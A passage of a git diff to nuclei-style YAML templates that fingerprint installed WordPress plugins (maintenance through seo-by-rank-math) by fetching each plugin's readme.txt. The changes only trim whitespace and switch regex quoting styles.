b/technologies/wordpress/wordpress-maintenance.yaml index 6c79d17443..90f2a69be1 100644 --- a/technologies/wordpress/wordpress-maintenance.yaml +++ b/technologies/wordpress/wordpress-maintenance.yaml @@ -1,4 +1,3 @@ - id: wordpress-maintenance info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/maintenance/ metadata: plugin_namespace: maintenance - wpscan: https://wpscan.com/plugin/maintenance + wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/maintenance/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-mainwp-child.yaml b/technologies/wordpress/wordpress-mainwp-child.yaml index 925d4e73ee..59218c38cf 100644 --- a/technologies/wordpress/wordpress-mainwp-child.yaml +++ b/technologies/wordpress/wordpress-mainwp-child.yaml @@ -1,4 +1,3 @@ - id: wordpress-mainwp-child info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/mainwp-child/ metadata: plugin_namespace: mainwp-child - wpscan: https://wpscan.com/plugin/mainwp-child + wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/mainwp-child/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-malcare-security.yaml b/technologies/wordpress/wordpress-malcare-security.yaml index f90c5f487b..cf60f19e49 100644 --- a/technologies/wordpress/wordpress-malcare-security.yaml +++ b/technologies/wordpress/wordpress-malcare-security.yaml @@ -1,4 +1,3 @@ - id: wordpress-malcare-security info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/malcare-security/ metadata: plugin_namespace: malcare-security - wpscan: https://wpscan.com/plugin/malcare-security + wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/malcare-security/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-megamenu.yaml b/technologies/wordpress/wordpress-megamenu.yaml index 9d3c88d547..12a28ca12b 100644 --- a/technologies/wordpress/wordpress-megamenu.yaml +++ b/technologies/wordpress/wordpress-megamenu.yaml @@ -1,4 +1,3 @@ - id: wordpress-megamenu info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/megamenu/ metadata: plugin_namespace: megamenu - wpscan: https://wpscan.com/plugin/megamenu + wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/megamenu/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-members.yaml b/technologies/wordpress/wordpress-members.yaml index 7fd08a6710..23917d1db2 100644 --- a/technologies/wordpress/wordpress-members.yaml +++ b/technologies/wordpress/wordpress-members.yaml @@ -1,4 +1,3 @@ - id: wordpress-members info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/members/ metadata: plugin_namespace: members - wpscan: https://wpscan.com/plugin/members + wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/members/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-meta-box.yaml b/technologies/wordpress/wordpress-meta-box.yaml index 4a394300f0..b02c756603 100644 --- a/technologies/wordpress/wordpress-meta-box.yaml +++ b/technologies/wordpress/wordpress-meta-box.yaml @@ -1,4 +1,3 @@ - id: wordpress-meta-box info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/meta-box/ metadata: plugin_namespace: meta-box - wpscan: https://wpscan.com/plugin/meta-box + wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/meta-box/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-ml-slider.yaml b/technologies/wordpress/wordpress-ml-slider.yaml index aa631c10fb..eea363f5bd 100644 --- a/technologies/wordpress/wordpress-ml-slider.yaml +++ b/technologies/wordpress/wordpress-ml-slider.yaml @@ -1,4 +1,3 @@ - id: wordpress-ml-slider info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/ml-slider/ metadata: plugin_namespace: ml-slider - wpscan: https://wpscan.com/plugin/ml-slider + wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ml-slider/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-newsletter.yaml b/technologies/wordpress/wordpress-newsletter.yaml index 041d3c79a9..2c82b5dd17 100644 --- a/technologies/wordpress/wordpress-newsletter.yaml +++ b/technologies/wordpress/wordpress-newsletter.yaml @@ -1,4 +1,3 @@ - id: wordpress-newsletter info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/newsletter/ metadata: plugin_namespace: newsletter - wpscan: https://wpscan.com/plugin/newsletter + wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/newsletter/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-nextend-facebook-connect.yaml b/technologies/wordpress/wordpress-nextend-facebook-connect.yaml index 2a0593c1c8..1c2f0ce0e0 100644 --- a/technologies/wordpress/wordpress-nextend-facebook-connect.yaml +++ b/technologies/wordpress/wordpress-nextend-facebook-connect.yaml @@ -1,4 +1,3 @@ - id: wordpress-nextend-facebook-connect info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: plugin_namespace: nextend-facebook-connect - wpscan: https://wpscan.com/plugin/nextend-facebook-connect + wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/nextend-facebook-connect/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-nextgen-gallery.yaml b/technologies/wordpress/wordpress-nextgen-gallery.yaml index 0640efbddc..4169deca8a 100644 --- a/technologies/wordpress/wordpress-nextgen-gallery.yaml +++ b/technologies/wordpress/wordpress-nextgen-gallery.yaml @@ -1,4 +1,3 @@ - id: wordpress-nextgen-gallery info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/nextgen-gallery/ metadata: plugin_namespace: nextgen-gallery - wpscan: https://wpscan.com/plugin/nextgen-gallery + wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/nextgen-gallery/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-ninja-forms.yaml b/technologies/wordpress/wordpress-ninja-forms.yaml index ca0c5db4e8..ee83a4268b 100644 --- a/technologies/wordpress/wordpress-ninja-forms.yaml +++ b/technologies/wordpress/wordpress-ninja-forms.yaml @@ -1,4 +1,3 @@ - id: wordpress-ninja-forms info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/ninja-forms/ metadata: plugin_namespace: ninja-forms - wpscan: https://wpscan.com/plugin/ninja-forms + wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-ocean-extra.yaml b/technologies/wordpress/wordpress-ocean-extra.yaml index 59a4d4aa9a..0c6cd27edc 100644 --- a/technologies/wordpress/wordpress-ocean-extra.yaml +++ b/technologies/wordpress/wordpress-ocean-extra.yaml @@ -1,4 +1,3 @@ - id: wordpress-ocean-extra info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/ocean-extra/ metadata: plugin_namespace: ocean-extra - wpscan: https://wpscan.com/plugin/ocean-extra + wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ocean-extra/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-official-facebook-pixel.yaml b/technologies/wordpress/wordpress-official-facebook-pixel.yaml index 7bdc6298b6..c76f405f51 100644 --- a/technologies/wordpress/wordpress-official-facebook-pixel.yaml +++ b/technologies/wordpress/wordpress-official-facebook-pixel.yaml @@ -1,4 +1,3 @@ - id: wordpress-official-facebook-pixel info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: plugin_namespace: official-facebook-pixel - wpscan: https://wpscan.com/plugin/official-facebook-pixel + wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/official-facebook-pixel/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-one-click-demo-import.yaml b/technologies/wordpress/wordpress-one-click-demo-import.yaml index bbc7fc8d99..daaa099b9c 100644 --- a/technologies/wordpress/wordpress-one-click-demo-import.yaml +++ b/technologies/wordpress/wordpress-one-click-demo-import.yaml @@ -1,4 +1,3 @@ - id: wordpress-one-click-demo-import info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/one-click-demo-import/ metadata: plugin_namespace: one-click-demo-import - wpscan: https://wpscan.com/plugin/one-click-demo-import + wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/one-click-demo-import/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-optinmonster.yaml b/technologies/wordpress/wordpress-optinmonster.yaml index fe15cec168..4b7e596d07 100644 --- a/technologies/wordpress/wordpress-optinmonster.yaml +++ b/technologies/wordpress/wordpress-optinmonster.yaml @@ -1,4 +1,3 @@ - id: wordpress-optinmonster info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/optinmonster/ metadata: plugin_namespace: optinmonster - wpscan: https://wpscan.com/plugin/optinmonster + wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/optinmonster/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-password-protected.yaml b/technologies/wordpress/wordpress-password-protected.yaml index 3fa00f864a..5204bd5485 100644 --- a/technologies/wordpress/wordpress-password-protected.yaml +++ b/technologies/wordpress/wordpress-password-protected.yaml @@ -1,4 +1,3 @@ - id: wordpress-password-protected info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/password-protected/ metadata: plugin_namespace: password-protected - wpscan: https://wpscan.com/plugin/password-protected + wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/password-protected/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-pdf-embedder.yaml b/technologies/wordpress/wordpress-pdf-embedder.yaml index 710f4c90c5..5efbd43e1b 100644 --- a/technologies/wordpress/wordpress-pdf-embedder.yaml +++ b/technologies/wordpress/wordpress-pdf-embedder.yaml @@ -1,4 +1,3 @@ - id: wordpress-pdf-embedder info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/pdf-embedder/ metadata: plugin_namespace: pdf-embedder - wpscan: https://wpscan.com/plugin/pdf-embedder + wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/pdf-embedder/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-photo-gallery.yaml b/technologies/wordpress/wordpress-photo-gallery.yaml index 66ec1f4dc6..b076a9a38f 100644 --- a/technologies/wordpress/wordpress-photo-gallery.yaml +++ b/technologies/wordpress/wordpress-photo-gallery.yaml @@ -1,4 +1,3 @@ - id: wordpress-photo-gallery info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/photo-gallery/ metadata: plugin_namespace: photo-gallery - wpscan: https://wpscan.com/plugin/photo-gallery + wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/photo-gallery/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-php-compatibility-checker.yaml b/technologies/wordpress/wordpress-php-compatibility-checker.yaml index a9e7b826ea..2d4b37de93 100644 --- a/technologies/wordpress/wordpress-php-compatibility-checker.yaml +++ b/technologies/wordpress/wordpress-php-compatibility-checker.yaml @@ -1,4 +1,3 @@ - id: wordpress-php-compatibility-checker info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/php-compatibility-checker/ metadata: plugin_namespace: php-compatibility-checker - wpscan: https://wpscan.com/plugin/php-compatibility-checker + wpscan: https://wpscan.com/plugin/php-compatibility-checker tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/php-compatibility-checker/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-pixelyoursite.yaml b/technologies/wordpress/wordpress-pixelyoursite.yaml index 632bcb6c18..f074fd1c83 100644 --- a/technologies/wordpress/wordpress-pixelyoursite.yaml +++ b/technologies/wordpress/wordpress-pixelyoursite.yaml @@ -1,4 +1,3 @@ - id: wordpress-pixelyoursite info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/pixelyoursite/ metadata: plugin_namespace: pixelyoursite - wpscan: https://wpscan.com/plugin/pixelyoursite + wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/pixelyoursite/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-polylang.yaml b/technologies/wordpress/wordpress-polylang.yaml index 45d2e3e5af..5312a4efa0 100644 --- a/technologies/wordpress/wordpress-polylang.yaml +++ b/technologies/wordpress/wordpress-polylang.yaml @@ -1,4 +1,3 @@ - id: wordpress-polylang info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/polylang/ metadata: plugin_namespace: polylang - wpscan: https://wpscan.com/plugin/polylang + wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/polylang/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-popup-builder.yaml b/technologies/wordpress/wordpress-popup-builder.yaml index afb3783170..f5eb59f76f 100644 --- a/technologies/wordpress/wordpress-popup-builder.yaml +++ b/technologies/wordpress/wordpress-popup-builder.yaml @@ -1,4 +1,3 @@ - id: wordpress-popup-builder info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/popup-builder/ metadata: plugin_namespace: popup-builder - wpscan: https://wpscan.com/plugin/popup-builder + wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-popup-maker.yaml b/technologies/wordpress/wordpress-popup-maker.yaml index 1a7cfda317..82e41d34e7 100644 --- a/technologies/wordpress/wordpress-popup-maker.yaml +++ b/technologies/wordpress/wordpress-popup-maker.yaml @@ -1,4 +1,3 @@ - id: wordpress-popup-maker info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/popup-maker/ metadata: plugin_namespace: popup-maker - wpscan: https://wpscan.com/plugin/popup-maker + wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/popup-maker/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-post-duplicator.yaml b/technologies/wordpress/wordpress-post-duplicator.yaml index 670c61336c..bcc8ad9a28 100644 --- a/technologies/wordpress/wordpress-post-duplicator.yaml +++ b/technologies/wordpress/wordpress-post-duplicator.yaml @@ -1,4 +1,3 @@ - id: wordpress-post-duplicator info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/post-duplicator/ metadata: plugin_namespace: post-duplicator - wpscan: https://wpscan.com/plugin/post-duplicator + wpscan: https://wpscan.com/plugin/post-duplicator tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/post-duplicator/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-post-smtp.yaml b/technologies/wordpress/wordpress-post-smtp.yaml index f5e0b7e113..f6632daa7b 100644 --- a/technologies/wordpress/wordpress-post-smtp.yaml +++ b/technologies/wordpress/wordpress-post-smtp.yaml @@ -1,4 +1,3 @@ - id: wordpress-post-smtp info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/post-smtp/ metadata: plugin_namespace: post-smtp - wpscan: https://wpscan.com/plugin/post-smtp + wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/post-smtp/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-post-types-order.yaml b/technologies/wordpress/wordpress-post-types-order.yaml index d1040d746b..4934f5c3b9 100644 --- a/technologies/wordpress/wordpress-post-types-order.yaml +++ b/technologies/wordpress/wordpress-post-types-order.yaml @@ -1,4 +1,3 @@ - id: wordpress-post-types-order info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/post-types-order/ metadata: plugin_namespace: post-types-order - wpscan: https://wpscan.com/plugin/post-types-order + wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/post-types-order/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml b/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml index 26c5d56c65..5e2fcdf570 100644 --- a/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml +++ b/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml @@ -1,4 +1,3 @@ - id: wordpress-premium-addons-for-elementor info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: plugin_namespace: premium-addons-for-elementor - wpscan: https://wpscan.com/plugin/premium-addons-for-elementor + wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-pretty-link.yaml b/technologies/wordpress/wordpress-pretty-link.yaml index f36e8e786e..a026379fd9 100644 --- a/technologies/wordpress/wordpress-pretty-link.yaml +++ b/technologies/wordpress/wordpress-pretty-link.yaml @@ -1,4 +1,3 @@ - id: wordpress-pretty-link info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/pretty-link/ metadata: plugin_namespace: pretty-link - wpscan: https://wpscan.com/plugin/pretty-link + wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/pretty-link/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-really-simple-captcha.yaml b/technologies/wordpress/wordpress-really-simple-captcha.yaml index 3e07acd7fa..0f5d24c628 100644 --- a/technologies/wordpress/wordpress-really-simple-captcha.yaml +++ b/technologies/wordpress/wordpress-really-simple-captcha.yaml @@ -1,4 +1,3 @@ - id: wordpress-really-simple-captcha info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/really-simple-captcha/ metadata: plugin_namespace: really-simple-captcha - wpscan: https://wpscan.com/plugin/really-simple-captcha + wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-really-simple-ssl.yaml b/technologies/wordpress/wordpress-really-simple-ssl.yaml index cc2fc8b7a5..99270b1932 100644 --- a/technologies/wordpress/wordpress-really-simple-ssl.yaml +++ b/technologies/wordpress/wordpress-really-simple-ssl.yaml @@ -1,4 +1,3 @@ - id: wordpress-really-simple-ssl info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/really-simple-ssl/ metadata: plugin_namespace: really-simple-ssl - wpscan: https://wpscan.com/plugin/really-simple-ssl + wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/really-simple-ssl/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-redirection.yaml b/technologies/wordpress/wordpress-redirection.yaml index cc626ff459..8676fffc45 100644 --- a/technologies/wordpress/wordpress-redirection.yaml +++ b/technologies/wordpress/wordpress-redirection.yaml @@ -1,4 +1,3 @@ - id: wordpress-redirection info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/redirection/ metadata: plugin_namespace: redirection - wpscan: https://wpscan.com/plugin/redirection + wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/redirection/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-redux-framework.yaml b/technologies/wordpress/wordpress-redux-framework.yaml index fb9e067c3f..5085265e3e 100644 --- a/technologies/wordpress/wordpress-redux-framework.yaml +++ b/technologies/wordpress/wordpress-redux-framework.yaml @@ -1,4 +1,3 @@ - id: wordpress-redux-framework info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/redux-framework/ metadata: plugin_namespace: redux-framework - wpscan: https://wpscan.com/plugin/redux-framework + wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/redux-framework/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-regenerate-thumbnails.yaml b/technologies/wordpress/wordpress-regenerate-thumbnails.yaml index 962316da48..3d743fff7b 100644 --- a/technologies/wordpress/wordpress-regenerate-thumbnails.yaml +++ b/technologies/wordpress/wordpress-regenerate-thumbnails.yaml @@ -1,4 +1,3 @@ - id: wordpress-regenerate-thumbnails info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: plugin_namespace: regenerate-thumbnails - wpscan: https://wpscan.com/plugin/regenerate-thumbnails + wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/regenerate-thumbnails/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-safe-svg.yaml b/technologies/wordpress/wordpress-safe-svg.yaml index 1772e8b1bb..95290e9e8c 100644 --- a/technologies/wordpress/wordpress-safe-svg.yaml +++ b/technologies/wordpress/wordpress-safe-svg.yaml @@ -1,4 +1,3 @@ - id: wordpress-safe-svg info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/safe-svg/ metadata: plugin_namespace: safe-svg - wpscan: https://wpscan.com/plugin/safe-svg + wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-seo-by-rank-math.yaml b/technologies/wordpress/wordpress-seo-by-rank-math.yaml index 11114deaab..d3d0c1550b 100644 --- a/technologies/wordpress/wordpress-seo-by-rank-math.yaml +++ b/technologies/wordpress/wordpress-seo-by-rank-math.yaml @@ -1,4 +1,3 @@ - id: wordpress-seo-by-rank-math info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: plugin_namespace: seo-by-rank-math - wpscan: https://wpscan.com/plugin/seo-by-rank-math + wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/seo-by-rank-math/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + 